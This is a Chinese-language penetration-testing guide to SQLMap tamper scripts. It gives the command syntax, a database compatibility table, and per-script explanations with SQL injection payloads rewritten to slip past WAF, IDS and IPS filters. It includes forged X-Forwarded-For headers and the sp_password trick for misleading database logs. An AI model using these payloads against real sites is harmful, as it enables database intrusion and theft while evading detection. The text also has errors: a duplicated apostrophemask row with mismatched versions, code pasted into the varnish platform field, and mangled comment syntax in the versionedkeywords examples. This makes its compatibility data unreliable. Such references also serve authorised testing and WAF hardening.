一、SQLMap中tamper的簡介
1.tamper的作用
使用SQLMap提供的tamper腳本,可在一定程度上避開應用程序的敏感字符過濾、繞過WAF規則的阻擋,繼而進行滲透攻擊。
部分防護系統的縮寫:
WAF:Web應用程序防火牆,Web Application Firewall
IPS:入侵防御系統, Intrusion Prevention System
IDS:入侵檢測系統,Intrusion Detection System
2.tamper用法
--tamper=TAMPER 利用給定的腳本進行篡改注入數據。其用法可舉例說明:
python sqlmap.py -u "http://.../?uname=admin&pwd=pass123" --level=5 --risk=3 -p "uname" --tamper=xxx.py
表示對指定的url地址,以所設置的level等級、risk等級,並采用選定的tamper篡改腳本對參數“uname”進行檢測
二、適配不同數據庫類型的測試tamper
當使用SQLMap篡改腳本執行滲透測試時,面對眾多tamper可能會比較困惑,一開始不曉得該使用哪些腳本來測試。有的腳本是適用於常用數據庫的SQL注入攻擊,有的適用於特定類型的數據庫,還有的適用於某種數據庫的特定版本范圍。為了相對明確的了解tamper的使用場景,把tamper的使用類型和范圍作一下划分,具體如下:
SQLMap目錄中的所有tamper script
tamper = apostrophemask , apostrophenullencode , appendnullbyte , base64encode , between , bluecoat , chardoubleencode , charencode , charunicodeencode , concat2concatws , equaltolike , greatest , halfversionedmorekeywords , ifnull2ifisnull , modsecurityversioned , modsecurityzeroversioned , multiplespaces , nonrecursivereplacement , percentage , randomcase , randomcomments , securesphere , space2comment , space2dash , space2hash , space2morehash , space2mssqlblank , space2mssqlhash , space2mysqlblank , space2mysqldash , space2plus , space2randomblank , sp_password , unionalltounion , unmagicquotes , versionedkeywords , versionedmorekeywords
通用的測試tamper
tamper = apostrophemask , apostrophenullencode , base64encode , between , chardoubleencode , charencode , charunicodeencode , equaltolike , greatest , ifnull2ifisnull , multiplespaces , nonrecursivereplacement , percentage , randomcase , securesphere , space2comment , space2plus , space2randomblank , unionalltounion , unmagicquotes
MSSQL(Microsoft SQL Servre)
tamper = between , charencode , charunicodeencode , equaltolike , greatest , multiplespaces , nonrecursivereplacement , percentage , randomcase , securesphere , sp_password , space2comment , space2dash , space2mssqlblank , space2mysqldash , space2plus , space2randomblank , unionalltounion , unmagicquotes
MySQL
tamper = between , bluecoat , charencode , charunicodeencode , concat2concatws , equaltolike , greatest , halfversionedmorekeywords , ifnull2ifisnull , modsecurityversioned , modsecurityzeroversioned , multiplespaces , nonrecursivereplacement , percentage , randomcase , securesphere , space2comment , space2hash , space2morehash , space2mysqldash , space2plus , space2randomblank , unionalltounion , unmagicquotes , versionedkeywords , versionedmorekeywords , xforwardedfor
Oracle
tamper = between , charencode , equaltolike , greatest , multiplespaces , nonrecursivereplacement , randomcase , securesphere , space2comment , space2plus , space2randomblank , unionalltounion , unmagicquotes , xforwardedfor
Microsoft Access
tamper = between , bluecoat , charencode , charunicodeencode , concat2concatws , equaltolike , greatest , halfversionedmorekeywords , ifnull2ifisnull , modsecurityversioned , modsecurityzeroversioned , multiplespaces , nonrecursivereplacement , percentage , randomcase , securesphere , space2comment , space2hash , space2morehash , space2mysqldash , space2plus , space2randomblank , unionalltounion , unmagicquotes , versionedkeywords , versionedmorekeywords
PostgreSQL
tamper=between , charencode , charunicodeencode , equaltolike , greatest , multiplespaces , nonrecursivereplacement , percentage , randomcase , securesphere , space2comment , space2plus , space2randomblank , xforwardedfor
tamper適用的數據庫類型&版本
(*) 可能適用於所有版本
(-) 不適用
| TAMPER |
MySQL |
MSSQL |
Oracle |
PostgreSQL |
| apostrophemask |
* |
* |
* |
* |
| apostrophenullencode |
- |
- |
- |
- |
| appendnullbyte |
* |
* |
* |
* |
| base64encode |
4,5,5.5 |
2005 |
10g |
- |
| between |
5.1 |
- |
- |
- |
| bluecoat |
* |
* |
* |
* |
| apostrophemask |
9.0.3 |
20002005 |
- |
9.3 |
| charunicodeencode |
4,5.0 and 5.5 |
2005 |
10g |
8.3,8.4,9.0 |
| charencode |
* |
- |
- |
- |
| commalessmid |
* |
- |
- |
- |
| concat2concatws |
* |
* |
* |
* |
| equaltolike |
* |
* |
* |
* |
| greatest |
< 5.1 |
- |
- |
- |
| halfversionedmorekeywords |
5.0 and 5.5 |
- |
- |
- |
| ifnull2ifisnull |
* |
* |
* |
* |
| informationschemacomment |
4,5.0,5.5 |
2005 |
10g |
8.3,8.4,9.0 |
| lowercase |
5 |
- |
- |
- |
| modsecurityversioned |
5 |
- |
- |
- |
| modsecurityzeroversioned |
* |
* |
* |
* |
| multiplespaces |
* |
* |
* |
* |
| nonrecursivereplacement |
* |
* |
* |
* |
| overlongutf8 |
5.1.56,5.5.11 |
2000, 2005 |
N/A |
9 |
| percentage |
4, 5.0,5.5 |
2005 |
10g |
8.3,8.4,9.0 |
| randomcase |
* |
* |
* |
* |
| randomcomments |
* |
* |
* |
* |
| securesphere |
4,5.0,5.5 |
2005 |
10g |
8.3,8.4,9.0 |
| space2comment |
- |
- |
- |
- |
| space2dash |
4.0,5.0 |
- |
- |
- |
| space2hash |
>= 5.1.13 |
- |
- |
- |
| space2morehash |
- |
2000, 2005 |
- |
- |
| space2mssqlblank |
* |
* |
- |
- |
| space2mssqlhash |
* |
* |
* |
* |
| space2plus |
4,5.0,5.5 |
2005 |
10g |
8.3,8.4,9.0 |
| space2randomblank |
- |
* |
- |
- |
| sp_password |
* |
* |
* |
* |
| symboliclogical |
* |
* |
* |
* |
| unionalltounion |
* |
* |
* |
* |
| unmagicquotes |
4, 5.0,5.5 |
2005 |
10g |
8.3,8.4,9.0 |
| uppercase |
* |
* |
* |
* |
| varnish |
* |
- |
- |
- |
| versionedkeywords |
>=5.1.13 |
- |
- |
- |
| versionedmorekeywords |
* |
* |
* |
* |
| xforwardedfor |
* |
* |
* |
* |
三、SQLMap中tamper篡改腳本的功能解釋
apostrophemask.py
功能:對引號進行utf-8格式編碼(%EF%BC%87)
平台:All
舉例:1 AND '1'='1 ==> 1 AND %EF%BC%871%EF%BC%87=%EF%BC%871
apostrophenullencode.py
功能:用非法的雙unicode字符(%00%27)替換引號字符
平台:All
舉例:1 AND '1'='1 ==> 1 AND %00%271%00%27=%00%271
appendnullbyte.py
功能:在有效載荷結束位置加載零字節字符編碼
平台:Microsoft Access
舉例:1 AND 1=1 ==> 1 AND 1=1%00
base64encode.py
功能:用base64格式進行編碼
平台:All
舉例:1' AND SLEEP(5)# ==> MScgQU5EIFNMRUVQKDUpIw==
between.py
功能:用between替換大於號(>)
平台:Mssql2005、MySQL 4/5.0/5.5、Oracle 10g、PostgreSQL 8.3/8.4/9.0
舉例:
1 AND A > B -- ==> 1 AND A NOT BETWEEN 0 AND B --
1 AND A = B -- ==> 1 AND A BETWEEN B AND B --
bluecoat.py
功能:對SQL語句替換空格字符為(%09),並替換"="--->"LIKE"
平台:MySQL 5.1, SGOS
舉例:SELECT username FROM users WHERE id = 1 ==> SELECT%09username FROM%09users WHERE%09id LIKE 1
apostrophemask.py
功能:用utf-8格式編碼引號(如:%EF%BC%87)
平台:All
舉例:1 AND '1'='1 ==> 1 AND %EF%BC%871%EF%BC%87=%EF%BC%871
charunicodeencode.py
功能:對字符串進行Unicode格式轉義編碼
平台:Mssql 2000,2005、MySQL 5.1.56、PostgreSQL 9.0.3 ASP/ASP.NET
舉例:SELECT FIELD%20FROM TABLE ==> %u0053%u0045%u004C%u0045%u0043%u0054%u0020%u0046%u0049%u0045%u004C%u0044%u0020%u0046%u0052%u004F%u004D%u0020%u0054%u0041%u0042%u004C%u0045
charencode.py
功能:采用url格式編碼1次
平台:Mssql 2005、MySQL 4, 5.0 and 5.5、Oracle 10g、PostgreSQL 8.3, 8.4, 9.0
舉例:SELECT FIELD FROM%20TABLE ==> %53%45%4C%45%43%54%20%46%49%45%4C%44%20%46%52%4F%4D%20%54%41%42%4C%45
chardoubleencode.py
功能:采用url格式編碼2次
平台:All
舉例:SELECT FIELD FROM%20TABLE ==> %2553%2545%254C%2545%2543%2554%2520%2546%2549%2545%254C%2544%2520%2546%2552%254F%254D%2520%2554%2541%2542%254C%2545
commalessmid.py
功能:將payload中的逗號用 from和for代替,用於過濾了逗號並且是3個參數的情況
平台:MySQL 5.0, 5.5
舉例:MID(VERSION(), 1, 1) ==> MID(VERSION() FROM 1 FOR 1)
concat2concatws.py
功能:CONCAT() ==> CONCAT_WS(),用於過濾了CONCAT()函數的情況
平台: MySQL 5.0
舉例:CONCAT(1,2) ==> CONCAT_WS(MID(CHAR(0),0,0),1,2)
equaltolike.py
功能:= ==> LIKE,用於過濾了等號"="的情況
平台:Mssql 2005、MySQL 4, 5.0 and 5.5
舉例:SELECT * FROM users WHERE id=1 ==> SELECT * FROM users WHERE id LIKE 1
greatest.py
功能:> ==> GREATEST
平台:MySQL 4, 5.0 and 5.5、Oracle 10g、PostgreSQL 8.3, 8.4, 9.0
舉例:1 AND A > B ==> 1 AND GREATEST(A, B+1)=A
a和b+1比較,取兩者中的最大值為a;則a >= b+1,亦即a > b
halfversionedmorekeywords.py
功能:空格 ==> /*!0 (在關鍵字前添加注釋)
平台:MySQL 4.0.18, 5.0.22(Mysql < 5.1)
舉例:union ==> /*!0union
ifnull2ifisnull.py
功能:IFNULL(A, B) ==> IF(ISNULL(A), B, A)
平台:MySQL 5.0 and 5.5
舉例:IFNULL(1, 2) ==> IF(ISNULL(1),2,1)
informationschemacomment.py
功能:
在 information_schema 后面加上 /**/ ,用於繞過對 information_schema 的情況
retVal = re.sub(r"(?i)(information_schema).", "g<1>/**/.", payload)
平台:All
舉例:select table_name from information_schema.tables ==> select table_name from information_schema/**/.tables
lowercase.py
功能:將 payload 里的大寫轉為小寫
平台:Mssql 2005、MySQL 4, 5.0 and 5.5、Oracle 10g、PostgreSQL 8.3, 8.4, 9.0
舉例:SELECT table_name FROM INFORMATION_SCHEMA.TABLES ==> select table_name from information_schema.tables
modsecurityversioned.py
功能:用注釋來包圍完整的查詢語句,用於繞過 ModSecurity 開源 waf
平台:MySQL 5.0
舉例:1 AND 2>1-- ==> 1 /*!30874AND 2>1*/--
modsecurityzeroversioned.py
功能:用注釋來包圍完整的查詢語句,用於繞過 waf ,和上面類似
平台:Mysql
舉例:1 and 2>1--+ ==> 1 /!00000and 2>1/--+
multiplespaces.py
功能:圍繞SQL關鍵字添加多個空格
平台:All
舉例:1 UNION SELECT foobar ==> 1 UNION SELECT foobar
nonrecursivereplacement.py
功能:關鍵字雙寫,可用於關鍵字過濾
平台:All
舉例:1 UNION SELECT 2-- ==> 1 UNIONUNION SELESELECTCT 2--
overlongutf8.py
功能: 轉換給定的payload當中的所有字符
平台:All
舉例:SELECT FIELD FROM TABLE WHERE 2>1 ==> SELECT%C0%AAFIELD%C0%AAFROM%C0%AATABLE%C0%AAWHERE%C0%AA2%C0%BE1
percentage.py
功能:用百分號來繞過關鍵字過濾,在關鍵字的每個字母前面都加一個(%)
平台:Mssql 2000, 2005、MySQL 5.1.56, 5.5.11、PostgreSQL 9.0
舉例:SELECT FIELD FROM TABLE ==> %S%E%L%E%C%T %F%I%E%L%D %F%R%O%M %T%A%B%L%E
randomcase.py
功能:將 payload 隨機大小寫
平台:Mssql 2005、MySQL 4, 5.0 and 5.5、Oracle 10g、PostgreSQL 8.3, 8.4, 9.0
舉例:INSERT ==> InseRt
randomcomments.py
功能:在 payload 的關鍵字中間隨機插入注釋符 /**/ ,可用於繞過關鍵字過濾
平台:Mysql
舉例:INSERT ==> I / ** / N / ** / SERT
securesphere.py
功能:在payload后追加特殊構造的字符串
平台:All
舉例:1 AND 1=1 ==> 1 AND 1=1 and '0having'='0having'
space2comment.py
功能:用注釋符 // 代替空格,用於空格的繞過
平台:Mssql 2005、MySQL 4, 5.0 and 5.5、Oracle 10g、PostgreSQL 8.3, 8.4, 9.0
舉例:SELECT id FROM users ==> SELECT//id//FROM//users
space2dash.py
功能:用[注釋符(--)+一個隨機字符串+一個換行符]替換控制符
平台:MSSQL、 SQLite
舉例:union select 1,2--+ ==> union--HSHjsJh%0Aselect--HhjHSJ%0A1,2--+
space2hash.py
功能:用[注釋符(#)+一個隨機字符串+一個換行符]替換控制符
平台:Mysql
舉例:union select 1,2--+ ==> union%23HSHjsJh%0Aselect%23HhjHSJ%0A1,2--+
space2morehash.py
功能:用多個[注釋符(#)+一個隨機字符串+一個換行符]替換控制符
平台:MySQL >= 5.1.13
舉例:union select 1,2--+ ==> union %23 HSHjsJh %0A select %23 HhjHSJ %0A%23 HJHJhj %0A 1,2--+
space2mssqlblank.py
功能:用隨機的空白符替換payload中的空格
blanks = ('%01', '%02', '%03', '%04', '%05', '%06', '%07', '%08', '%09', '%0B', '%0C', '%0D', '%0E', '%0F', '%0A')
平台:Mssql 2000,2005
舉例:SELECT id FROM users ==> SELECT%0Eid%0DFROM%07users
space2mssqlhash.py
功能:用[字符# +一個換行符]替換payload中的空格
平台:MSSQL、MySQL
舉例:union select 1,2--+ ==> union%23%0Aselect%23%0A1,2--+
space2plus.py
功能:用加號(+)替換空格
平台:All
舉例:SELECT id FROM users ==> SELECT+id+FROM+users
space2randomblank.py
功能:用隨機的空白符替換payload中的空格
平台:Mssql 2005、MySQL 4, 5.0 and 5.5、Oracle 10g、PostgreSQL 8.3, 8.4, 9.0
舉例:SELECT id FROM users ==> SELECT%0Did%0DFROM%0Ausers
sp_password.py
功能:在payload語句后添加 sp_password ,用於迷惑數據庫日志(Space ==> sp_password)
平台:Mssql
舉例:1 AND 9227=9227-- ==> 1 AND 9227=9227 -- sp_password
symboliclogical.py
功能:用 && 替換 and ,用 || 替換 or ,用於這些關鍵字被過濾的情況
平台:All
舉例:
1 and 1=1 ==> 1 %26%26 1=1
1 or 1=1 ==> 1 %7c%7c 1=1
unionalltounion.py
功能:用 union select 替換union all select
平台:All
舉例:union all select 1,2--+ ==> union select 1,2--+
unmagicquotes.py
功能:用寬字符繞過 GPC addslashes
平台:All
舉例:1' and 1=1 ==> 1%df%27 and 1=1--
uppercase.py
功能:將payload中的小寫字母轉為大寫格式
平台:Mssql 2005、MySQL 4, 5.0 and 5.5、Oracle 10g、PostgreSQL 8.3, 8.4, 9.0
舉例:insert ==> INSERT
varnish.py
功能:添加一個HTTP頭“ X-originating-IP ”來繞過WAF
平台:headers = kwargs.get("headers", {})headers["X-originating-IP"] = "127.0.0.1"return payload
舉例:All
versionedkeywords.py
功能:對非函數的關鍵字進行注釋
平台:MySQL 4.0.18, 5.1.56, 5.5.11
舉例:1 union select user() ==> 1/!UNION//!SELECT/user()
versionedmorekeywords.py
功能:對每個關鍵字進行注釋處理
平台:MySQL 5.1.56, 5.5.11
舉例:1 union select user() ==> 1/!UNION//!SELECT/user()
xforwardedfor.py
功能:添加一個偽造的HTTP頭“ X-Forwarded-For ”來繞過WAF
平台:All
舉例:headers = kwargs.get("headers", {})headers["X-Forwarded-For"] = randomIP()return payload